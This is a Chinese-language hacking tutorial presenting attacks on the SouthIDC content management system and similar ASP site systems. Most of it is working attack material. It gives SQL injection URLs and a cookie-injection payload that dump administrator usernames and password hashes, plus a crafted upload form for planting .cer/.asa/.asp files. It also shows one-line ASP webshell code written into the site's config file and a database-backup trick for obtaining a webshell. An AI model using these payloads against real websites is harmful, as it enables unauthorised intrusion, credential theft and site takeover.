南方資料編輯器southidceditor最新注入0day漏洞

1.注入點:

代碼如下	複製代碼
news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7

直接暴管理員帳號密碼(md5)

2.登陸後台

3.利用編輯器上傳:

訪問

代碼如下	複製代碼
admin/southidceditor/admin_style.asp

修改編輯器樣式,增加asa(不要asp).然後直接後台編輯新聞上傳.

========================================

參考資料整理:

1、通過upfile_other.asp漏洞檔案直接取SHELL

直接開啟userreg.asp進行註冊會員，進行登入，（在未退出登入的狀態下）使用本地上傳檔案進行上傳代碼如下：

代碼如下

複製代碼

<HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <STYLE type=text/css>BODY { FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee } .tx1 { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px } </STYLE> <META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> <BODY leftMargin=0 topMargin=0> <FORM name=form1 action="/upfile_Other.asp"; method=post encType=multipart/form-data><INPUT type=file size=30 name=FileName> <INPUT type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上傳 name=Submit> <INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>

將以上代碼儲存為html格式，替換代碼中的網址，第一個框裡選擇圖片檔案，第二個框選擇.cer、.asa或asp檔案上傳（後面需要加一個空格，貌似在IE8中進行使用不能後面加空格，加空格時就彈出選擇檔案對話方塊，我是找不到解決辦法）。

註：此方法通殺南方資料、良精系統、網軟天下等

2、通過注入秒殺管理員帳號密碼，使用如下：

代碼如下	複製代碼
/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’

以上代碼直接暴管理員帳號和密碼，取SHELL方法如下：

在網站配置[/admin/SiteConfig.asp]的著作權資訊裡寫入 "%><%eval(request(chr(35)))%><%’
成功把shell寫入

代碼如下	複製代碼
/inc/config.asp

這裡一句話chr(32)密碼是“#”

3、cookie注入

清空地址欄，利用union語句來注入，提交：

代碼如下	複製代碼
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))

如果你牛你就手工，反正我是不會，用刺蝟大哥的“cookie注入轉換工具”方便又迅速何樂而不為？

註：貌似南方資料、良精系統、網軟天下等系統也都存在COOKIE注入。

（當然南方不只有上面三個漏洞，還有幾個漏洞貌似不常用，反正我給我常用的總結出來希望對大家有協助）

三、後台取SHELL方法總結

（1）在系統管理中的網站配置中插入一句話馬：進入後台後,點左邊的”系統管理”再點擊”網站配置”在右邊的”網站名稱”(也可以在其它處)後加入”%><%Eval(Request(chr(112)))%><%’，再點儲存配置，如圖：

然後我們開啟inc/config.asp檔案，看到一句話馬已寫入到設定檔中了，

這時再開啟一句話馬的用戶端,提交同樣得到一個小馬

(注:以下均在其它網站上測試所截的圖，為防止資訊洩漏，未截留網站串連，請諒解！)

（2）後台上傳漏洞,在Upfile_Photo.asp檔案中部分程式碼片段如下：

代碼如下	複製代碼
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then EnableUpload=false end if if EnableUpload=false then msg="這種檔案類型不允許上傳！nn只允許上傳這幾種檔案類型：" & UpFileType FoundErr=true end if

大家可以看到程式只限制了對”asp”，”asa”,”aspx”類的檔案上傳，我們只要在”網站配置”的允許的上傳檔案類型處增加上傳“cer“等被伺服器可解析的檔案類型就可，如圖：
提交時卻顯示下載頁面 ,上傳其它如”htr,cdx”等尾碼檔案時,提交時伺服器卻不請求(只能說運氣不好吧)

（3）後台備份,直接在”產品管理”下的添加產品中上傳jpg尾碼的asp馬,再到”系統管理”下的Database Backup,在”當前資料庫路徑”欄填入上傳的路徑,在” 備份資料庫名稱”填入你要備份馬的名稱,不過系統會在名稱後自動添加上.asa的

點”確定”後提示”備份資料庫成功….”不過實際檔案是沒有.asa的

直接存取備份後的地址,就得到一個webshell
（以上雖用網軟做的後台示範，但南方和良精後台取shell都是大同小異的）